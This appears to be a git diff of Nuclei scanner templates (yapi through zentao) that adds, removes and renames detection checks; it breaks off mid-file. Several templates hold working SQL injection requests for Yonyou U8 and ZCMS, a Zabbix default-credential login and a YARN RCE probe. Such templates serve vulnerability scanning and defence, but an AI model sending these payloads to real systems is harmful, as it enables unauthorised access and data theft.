severity: info - tags: tech,yapi -requests: - - method: GET - path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<title>YApi-高效、易用、功能强大的可视化接口管理平台" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/yapi-detect-11721.yaml b/nuclei-templates/Other/yapi-detect-11721.yaml new file mode 100644 index 0000000000..3d24ff00ba --- /dev/null +++ b/nuclei-templates/Other/yapi-detect-11721.yaml @@ -0,0 +1,21 @@ +id: yapi-detect +info: + name: YApi Detect + author: pikpikcu + severity: info + metadata: + shodan-query: http.title:"YApi" + tags: tech,yapi +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "YApi-高效、易用、功能强大的可视化接口管理平台" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/yapi-rce.yaml b/nuclei-templates/Other/yapi-rce-11724.yaml similarity index 100% rename from nuclei-templates/Other/yapi-rce.yaml rename to nuclei-templates/Other/yapi-rce-11724.yaml diff --git a/nuclei-templates/Other/yarn-lock-11729.yaml b/nuclei-templates/Other/yarn-lock-11729.yaml new file mode 100644 index 0000000000..d75da95303 --- /dev/null +++ b/nuclei-templates/Other/yarn-lock-11729.yaml @@ -0,0 +1,30 @@ +id: yarn-lock + +info: + name: yarn lock file disclosure + author: oppsec + severity: info + description: The yarn.lock file stores the versions of each Yarn dependency installed. + tags: exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/yarn.lock" + + matchers-condition: and + matchers: + - type: word + words: + - "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY." + - "# yarn lockfile v1" + condition: and + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/yarn-lock-11730.yaml b/nuclei-templates/Other/yarn-lock-11730.yaml deleted file mode 100644 index f9a33a2741..0000000000 --- a/nuclei-templates/Other/yarn-lock-11730.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: yarn-lock -info: - name: yarn lock file disclosure - author: oppsec - severity: info - description: yarn.lock is a file which store all exactly versions of each dependency were installed. - tags: exposure -requests: - - method: GET - path: - - "{{BaseURL}}/yarn.lock" - matchers-condition: and - matchers: - - type: word - words: - - "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY." - - "# yarn lockfile v1" - condition: and - - type: word - words: - - "text/html" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/yarn-manager-exposure-11733.yaml b/nuclei-templates/Other/yarn-manager-exposure-11733.yaml new file mode 100644 index 0000000000..a599206724 --- /dev/null +++ b/nuclei-templates/Other/yarn-manager-exposure-11733.yaml @@ -0,0 +1,19 @@ +id: yarn-manager-exposure + +info: + name: Apache Yarn ResourceManager Exposure / Unauthenticated Access + author: pdteam + severity: low + tags: panel,apache,yarn,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/cluster/cluster' + matchers: + - type: word + words: + - 'hadoop' + - 'resourcemanager' + - 'logged in as: dr.who' + condition: and diff --git a/nuclei-templates/Other/yarn-manager-exposure.yaml b/nuclei-templates/Other/yarn-manager-exposure.yaml deleted file mode 100644 index f423fe04a3..0000000000 --- a/nuclei-templates/Other/yarn-manager-exposure.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: yarn-manager-exposure -info: - name: Apache Yarn ResourceManager Exposure / Unauthenticated Access - author: pdteam - severity: low - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/cluster/cluster' - matchers: - - type: word - words: - - 'hadoop' - - 'resourcemanager' - - 'logged in as: dr.who' - condition: and diff --git a/nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml b/nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml new file mode 100644 index 0000000000..1189161af1 --- /dev/null +++ b/nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml @@ -0,0 +1,25 @@ +id: yarn-resourcemanager-rce + +info: + name: Apache Yarn ResourceManager RCE + author: pdteam + severity: low + tags: apache,rce + description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. + reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 + +requests: + - method: POST + path: + - '{{BaseURL}}/ws/v1/cluster/apps/new-application' + + matchers-condition: and + matchers: + - type: word + words: + - application-id + - maximum-resource-capability + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/yarn-resourcemanager-rce.yaml b/nuclei-templates/Other/yarn-resourcemanager-rce.yaml deleted file mode 100644 index 24473cc943..0000000000 --- a/nuclei-templates/Other/yarn-resourcemanager-rce.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: yarn-resourcemanager-rce -info: - name: Apache Yarn ResourceManager RCE - author: pdteam - severity: low - description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. - reference: - - https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 - tags: apache,rce -requests: - - method: POST - path: - - '{{BaseURL}}/ws/v1/cluster/apps/new-application' - matchers-condition: and - matchers: - - type: word - words: - - application-id - - maximum-resource-capability - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/yii-debugger-11738.yaml b/nuclei-templates/Other/yii-debugger-11738.yaml deleted file mode 100644 index 062b2d6696..0000000000 --- a/nuclei-templates/Other/yii-debugger-11738.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: yii-debugger -info: - name: View Yii Debugger Information - author: geeknik - severity: low - reference: - - https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - tags: yii,debug,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/debug/default/view.html" - - "{{BaseURL}}/debug/default/view" - - "{{BaseURL}}/frontend/web/debug/default/view" - - "{{BaseURL}}/web/debug/default/view" - - "{{BaseURL}}/sapi/debug/default/view" - redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Yii Debugger" - - "Status" - - "Route" - - "Log" - - "Time" - - "Memory" - - "DB" - condition: and diff --git a/nuclei-templates/Other/yii-debugger.yaml b/nuclei-templates/Other/yii-debugger.yaml new file mode 100644 index 0000000000..091dd84ee0 --- /dev/null +++ b/nuclei-templates/Other/yii-debugger.yaml @@ -0,0 +1,30 @@ +id: yii-debugger +info: + name: View Yii Debugger Information + author: geeknik + reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}/debug/default/view.html" + - "{{BaseURL}}/debug/default/view" + - "{{BaseURL}}/frontend/web/debug/default/view" + - "{{BaseURL}}/web/debug/default/view" + - "{{BaseURL}}/sapi/debug/default/view" + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Yii Debugger" + - "Status" + - "Route" + - "Log" + - "Time" + - "Memory" + - "DB" + condition: and diff --git a/nuclei-templates/Other/yisaitong-dataimport-rce.yaml b/nuclei-templates/Other/yisaitong-dataImport-rce.yaml similarity index 100% rename from nuclei-templates/Other/yisaitong-dataimport-rce.yaml rename to nuclei-templates/Other/yisaitong-dataImport-rce.yaml diff --git a/nuclei-templates/Other/yongyou-ELTextFile.yaml b/nuclei-templates/Other/yongyou-eltextfile.yaml similarity index 100% rename from nuclei-templates/Other/yongyou-ELTextFile.yaml rename to nuclei-templates/Other/yongyou-eltextfile.yaml diff --git a/nuclei-templates/Other/yongyou-icurrtype-sqli.yaml b/nuclei-templates/Other/yongyou-icurrtype-sqli.yaml index 219b23ef78..a64ad4cc8a 100644 --- a/nuclei-templates/Other/yongyou-icurrtype-sqli.yaml +++ b/nuclei-templates/Other/yongyou-icurrtype-sqli.yaml @@ -7,32 +7,27 @@ info: requests: - raw: - | - POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1 + POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1 Host: {{Hostname}} - Pragma: no-cache - Cache-Control: no-cache - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6 - Cookie: JSESSIONID=CC5E992D50829FCC76FC9789169C06A7.server + DNT: 1 + X-Forwarded-For: 8.8.8.8 Connection: close - Content-Length: 258 + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + Content-Length: 667 - - - - - - + 1' matchers-condition: and matchers: - type: status status: - - 200 + - 500 - type: word words: - - "jdbc:" + - "ORA-01756" part: body condition: and diff --git a/nuclei-templates/Other/yongyou-u8-RegisterServlet-sql-Injection.yaml b/nuclei-templates/Other/yongyou-u8-RegisterServlet-sql-Injection.yaml new file mode 100644 index 0000000000..879d708ad5 --- /dev/null +++ b/nuclei-templates/Other/yongyou-u8-RegisterServlet-sql-Injection.yaml @@ -0,0 +1,31 @@ +id: yonyou-u8-cloud-RegisterServlet-sql + +info: + name: 用友u8-cloud RegisterServlet SQL注入 + author: Co5mos + severity: high + description: + 用友U8 cloud的RegisterServlet接口对用户传入的参数未进行有效的过滤,攻击者可利用该漏洞进行sql注入。 + metadata: + fofa-query: app="用友-U8-Cloud" +http: + - raw: + - |- + POST /servlet/RegisterServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 + Connection: close + Content-Length: 85 + Accept: */* + Accept-Language: en + Content-Type: application/x-www-form-urlencoded + X-Forwarded-For: 127.0.0.1 + Accept-Encoding: gzip + + usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code==200 && contains(body_1, "e10adc3949ba59abbe56e057f20f883e")' \ No newline at end of file diff --git a/nuclei-templates/Other/yongyou-u8-oa-sqli-11747.yaml b/nuclei-templates/Other/yongyou-u8-oa-sqli-11747.yaml deleted file mode 100644 index 7be4058972..0000000000 --- a/nuclei-templates/Other/yongyou-u8-oa-sqli-11747.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: yongyou-u8-oa-sqli -info: - name: Yongyou U8 OA Sqli - author: ritikchaddha - severity: high - reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: yongyou,u8,oa,sqli -requests: - - method: GET - path: - - "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5("{{randstr}}")}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/yongyou-u8-oa-sqli.yaml b/nuclei-templates/Other/yongyou-u8-oa-sqli.yaml new file mode 100644 index 0000000000..f572945783 --- /dev/null +++ b/nuclei-templates/Other/yongyou-u8-oa-sqli.yaml @@ -0,0 +1,25 @@ +id: yongyou-u8-oa-sqli + +info: + name: Yongyou U8 OA Sqli + author: ritikchaddha + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: yongyou,u8,oa,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/yonyou-nc-cloud-jsinvoke-rce.yaml b/nuclei-templates/Other/yonyou-nc-cloud-rce.yaml similarity index 100% rename from nuclei-templates/Other/yonyou-nc-cloud-jsinvoke-rce.yaml rename to nuclei-templates/Other/yonyou-nc-cloud-rce.yaml diff --git a/nuclei-templates/Other/yonyou-u8-oa-sqli-11748.yaml b/nuclei-templates/Other/yonyou-u8-oa-sqli-11748.yaml new file mode 100644 index 0000000000..40178f804e --- /dev/null +++ b/nuclei-templates/Other/yonyou-u8-oa-sqli-11748.yaml @@ -0,0 +1,37 @@ +id: yonyou-u8-oa-sqli + +info: + name: Yonyou U8 - SQL Injection + author: ritikchaddha + severity: critical + description: Yonyou U8 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + - https://www.tencentcloud.com/document/product/627/38435 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-89 + metadata: + max-request: 1 + tags: yonyou,oa,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100f125e83325bba41b548340828884cf23cc66295d4116d4a79cbfcb8f2f25d649022100aebb7e676d7011f9805677596238172ff73cf16be9aa5aefcfe8efadabb1d1ac:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/yonyou-u8-oa-sqli.yaml b/nuclei-templates/Other/yonyou-u8-oa-sqli.yaml deleted file mode 100644 index e65cbf9cab..0000000000 --- a/nuclei-templates/Other/yonyou-u8-oa-sqli.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: yonyou-u8-oa-sqli - -info: - name: Yonyou U8 OA Sqli - author: ritikchaddha - severity: high - reference: - - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: yonyou,oa,sqli - -requests: - - method: GET - path: - - "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5("{{randstr}}")}}' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/yonyou-u8-registerservlet-sqli.yaml b/nuclei-templates/Other/yonyou-u8-registerservlet-sqli.yaml deleted file mode 100644 index 422b4fdd31..0000000000 --- a/nuclei-templates/Other/yonyou-u8-registerservlet-sqli.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: yonyou-u8-cloud-RegisterServlet-sql - -info: - name: 用友u8-cloud RegisterServlet SQL注入 - author: Co5mos - severity: high - description: - 用友U8 cloud的RegisterServlet接口对用户传入的参数未进行有效的过滤,攻击者可利用该漏洞进行sql注入。 - metadata: - fofa-query: app="用友-U8-Cloud" - tags: yonyou, sqli - -http: - - raw: - - | - POST /servlet/RegisterServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'status_code==200 && contains(body_1, "e10adc3949ba59abbe56e057f20f883e")' diff --git a/nuclei-templates/Other/yopass-panel-11749.yaml b/nuclei-templates/Other/yopass-panel-11749.yaml new file mode 100644 index 0000000000..27e0187e51 --- /dev/null +++ b/nuclei-templates/Other/yopass-panel-11749.yaml @@ -0,0 +1,16 @@ +id: yopass-panel +info: + name: Yopass Application Exposure + author: Adam Crosser + severity: info + metadata: + shodan-query: title:"Yopass" + tags: panel,yopass +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "Yopass" diff --git a/nuclei-templates/Other/yopass-panel-11750.yaml b/nuclei-templates/Other/yopass-panel-11750.yaml deleted file mode 100644 index 44469b9c48..0000000000 --- a/nuclei-templates/Other/yopass-panel-11750.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: yopass-panel - -info: - name: Yopass Application Exposure - author: Adam Crosser - severity: info - tags: panel,yopass - metadata: - shodan-query: 'title:"Yopass"' - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - "<title>Yopass" diff --git a/nuclei-templates/Other/yunxintong-fileRead.yaml b/nuclei-templates/Other/yunxintong-fileread.yaml similarity index 100% rename from nuclei-templates/Other/yunxintong-fileRead.yaml rename to nuclei-templates/Other/yunxintong-fileread.yaml diff --git a/nuclei-templates/Other/yzmcms-detect-11751.yaml b/nuclei-templates/Other/yzmcms-detect-11751.yaml deleted file mode 100644 index e7f31c36a2..0000000000 --- a/nuclei-templates/Other/yzmcms-detect-11751.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: yzmcms-detect - -info: - name: YzmCMS Detect - author: pikpikcu - severity: info - tags: yzmcms,tech - -requests: - - method: GET - path: - - '{{BaseURL}}/admin/index/login.html' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - 'Powered By <a href="http://www.yzmcms.com"' diff --git a/nuclei-templates/Other/yzmcms-detect.yaml b/nuclei-templates/Other/yzmcms-detect.yaml new file mode 100644 index 0000000000..8a2f5f78d9 --- /dev/null +++ b/nuclei-templates/Other/yzmcms-detect.yaml @@ -0,0 +1,19 @@ +id: yzmcms-detect +info: + name: YzmCMS Detect + author: pikpikcu + severity: info + tags: yzmcms,tech +requests: + - method: GET + path: + - '{{BaseURL}}/admin/index/login.html' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'Powered By <a href="http://www.yzmcms.com"' diff --git a/nuclei-templates/Other/zabbix-dashboards-access-11754.yaml b/nuclei-templates/Other/zabbix-dashboards-access-11754.yaml deleted file mode 100644 index 116f3cd89b..0000000000 --- a/nuclei-templates/Other/zabbix-dashboards-access-11754.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: zabbix-dashboards-access - -info: - name: zabbix-dashboards-access - author: pussycat0x,vsh00t - severity: medium - description: View dashboard with guest login. - reference: - - https://www.exploit-db.com/ghdb/5595 - - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt - tags: zabbix,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list" - - matchers-condition: and - matchers: - - type: word - words: - - "Create dashboard" - - "Zabbix SIA" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/zabbix-dashboards-access.yaml b/nuclei-templates/Other/zabbix-dashboards-access.yaml new file mode 100644 index 0000000000..1aa5a28a26 --- /dev/null +++ b/nuclei-templates/Other/zabbix-dashboards-access.yaml @@ -0,0 +1,28 @@ +id: zabbix-dashboards-access + +info: + name: zabbix-dashboards-access + author: pussycat0x,vsh00t + severity: medium + description: View dashboard with guest login. + reference: + - https://www.exploit-db.com/ghdb/5595 + - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt + tags: zabbix,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list" + + matchers-condition: and + matchers: + - type: word + words: + - "Create dashboard" + - "Zabbix SIA" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/zabbix-default-credentials-11758.yaml b/nuclei-templates/Other/zabbix-default-credentials-11758.yaml deleted file mode 100644 index da0f08e602..0000000000 --- a/nuclei-templates/Other/zabbix-default-credentials-11758.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: zabbix-default-credentials - -info: - name: Zabbix Default Credentials - author: pdteam - severity: critical - tags: zabbix,default-login - -requests: - - method: POST - path: - - '{{BaseURL}}/index.php' - headers: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - - body: name=Admin&password=zabbix&autologin=1&enter=Sign+in - - matchers-condition: and - matchers: - - type: word - words: - - "zabbix.php?action=dashboard.view" - - - type: status - status: - - 302 \ No newline at end of file diff --git a/nuclei-templates/Other/zabbix-default-credentials.yaml b/nuclei-templates/Other/zabbix-default-credentials.yaml new file mode 100644 index 0000000000..246a9ed52a --- /dev/null +++ b/nuclei-templates/Other/zabbix-default-credentials.yaml @@ -0,0 +1,22 @@ +id: zabbix-default-credentials +info: + name: Zabbix Default Credentials + author: pdteam + severity: critical + tags: zabbix,default-login +requests: + - method: POST + path: + - '{{BaseURL}}/index.php' + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + body: name=Admin&password=zabbix&autologin=1&enter=Sign+in + matchers-condition: and + matchers: + - type: word + words: + - "zabbix.php?action=dashboard.view" + - type: status + status: + - 302 diff --git a/nuclei-templates/Other/zabbix-default-login.yaml b/nuclei-templates/Other/zabbix-default-login.yaml index 2f38485317..c28c788318 100644 --- a/nuclei-templates/Other/zabbix-default-login.yaml +++ b/nuclei-templates/Other/zabbix-default-login.yaml @@ -1,16 +1,11 @@ id: zabbix-default-login + info: name: Zabbix Default Login author: pdteam - severity: high - description: Zabbix default admin credentials were discovered. - reference: - - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + severity: critical tags: zabbix,default-login + requests: - raw: - | @@ -20,20 +15,21 @@ requests: X-Requested-With: XMLHttpRequest name={{username}}&password={{password}}&autologin=1&enter=Sign+in + payloads: username: - Admin password: - zabbix attack: pitchfork + matchers-condition: and matchers: - type: word part: header words: - "zabbix.php?action=dashboard.view" + - type: status status: - 302 - -# Enhanced by mp on 2022/03/13 diff --git a/nuclei-templates/Other/zabbix-server-login-11769.yaml b/nuclei-templates/Other/zabbix-server-login-11769.yaml new file mode 100644 index 0000000000..b0660f42c8 --- /dev/null +++ b/nuclei-templates/Other/zabbix-server-login-11769.yaml @@ -0,0 +1,22 @@ +id: zabbix-server-login + +info: + name: Zabbix Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 + tags: panel,zabbix + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "<title>zabbix-server: Zabbix" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zabbix-server-login-11770.yaml b/nuclei-templates/Other/zabbix-server-login-11770.yaml deleted file mode 100644 index 44aa8646f2..0000000000 --- a/nuclei-templates/Other/zabbix-server-login-11770.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: zabbix-server-login -info: - name: Zabbix Login - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 - tags: panel,zabbix -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - "zabbix-server: Zabbix" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/zcms-v3-sqli.yaml b/nuclei-templates/Other/zcms-v3-sqli.yaml index a7084a23d3..ed56b88314 100644 --- a/nuclei-templates/Other/zcms-v3-sqli.yaml +++ b/nuclei-templates/Other/zcms-v3-sqli.yaml @@ -6,18 +6,16 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/nuclei-templates/Other/zend-config-file.yaml b/nuclei-templates/Other/zend-config-file.yaml index b88e93976a..0628a472da 100644 --- a/nuclei-templates/Other/zend-config-file.yaml +++ b/nuclei-templates/Other/zend-config-file.yaml @@ -1,18 +1,33 @@ id: zend-config-file info: name: Zend Configuration File - author: pdteam + author: pdteam,geeknik severity: high tags: config,exposure,zend,php requests: - method: GET path: - "{{BaseURL}}/application/configs/application.ini" + - "{{BaseURL}}/admin/configs/application.ini" + - "{{BaseURL}}/application.ini" + - "{{BaseURL}}/aplicacao/application/configs/application.ini" + - "{{BaseURL}}/cloudexp/application/configs/application.ini" + - "{{BaseURL}}/cms/application/configs/application.ini" + - "{{BaseURL}}/moto/application/configs/application.ini" + - "{{BaseURL}}/Partners/application/configs/application.ini" + - "{{BaseURL}}/radio/application/configs/application.ini" + - "{{BaseURL}}/seminovos/application/configs/application.ini" + - "{{BaseURL}}/shop/application/configs/application.ini" + - "{{BaseURL}}/site_cg/application/configs/application.ini" + - "{{BaseURL}}/slr/application/configs/application.ini" + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "resources.db.params.password" + - "resources.db.params.username" + condition: and - type: word words: - "text/plain" diff --git a/nuclei-templates/Other/zendesk-takeover-11781.yaml b/nuclei-templates/Other/zendesk-takeover-11781.yaml deleted file mode 100644 index 13c5be4d12..0000000000 --- a/nuclei-templates/Other/zendesk-takeover-11781.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: zendesk-takeover - -info: - name: zendesk takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - this help center no longer exists \ No newline at end of file diff --git a/nuclei-templates/Other/zendesk-takeover-11783.yaml b/nuclei-templates/Other/zendesk-takeover-11783.yaml new file mode 100644 index 0000000000..d5ba5d488f --- /dev/null +++ b/nuclei-templates/Other/zendesk-takeover-11783.yaml @@ -0,0 +1,15 @@ +id: zendesk-takeover +info: + name: zendesk takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - this help center no longer exists diff --git a/nuclei-templates/Other/zenphoto-installation-sensitive-info.yaml b/nuclei-templates/Other/zenphoto-installation-sensitive-info.yaml deleted file mode 100644 index b3ba0c441a..0000000000 --- a/nuclei-templates/Other/zenphoto-installation-sensitive-info.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: zenphoto-sensitive-info - -info: - name: Zenphoto Installation Sensitive Information - author: qlkwej - severity: medium - description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive - information disclosure - tags: unauth - -requests: - - method: GET - path: - - '{{BaseURL}}/zenphoto/zp-core/setup/index.php' - - '{{BaseURL}}/zp/zp-core/setup/index.php' - - '{{BaseURL}}/gallery/zp-core/setup/index.php' - - '{{BaseURL}}/zp-core/setup/index.php' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - Welcome to Zenphoto! This page will set up Zenphoto - part: body - - - type: word - words: - - text/html - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/zenphoto-sensitive-info.yaml b/nuclei-templates/Other/zenphoto-sensitive-info.yaml new file mode 100644 index 0000000000..9d75e6f25f --- /dev/null +++ b/nuclei-templates/Other/zenphoto-sensitive-info.yaml @@ -0,0 +1,32 @@ +id: zenphoto-sensitive-info + +info: + name: Zenphoto Installation Sensitive Information + author: qlkwej + severity: medium + description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive + information disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/zenphoto/zp-core/setup/index.php' + - '{{BaseURL}}/zp/zp-core/setup/index.php' + - '{{BaseURL}}/gallery/zp-core/setup/index.php' + - '{{BaseURL}}/zp-core/setup/index.php' + + matchers-condition: and + matchers: + - type: word + words: + - Welcome to Zenphoto! This page will set up Zenphoto + part: body + + - type: word + words: + - text/html + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zentao-detect-11785.yaml b/nuclei-templates/Other/zentao-detect-11785.yaml deleted file mode 100644 index 7b47941c0e..0000000000 --- a/nuclei-templates/Other/zentao-detect-11785.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: 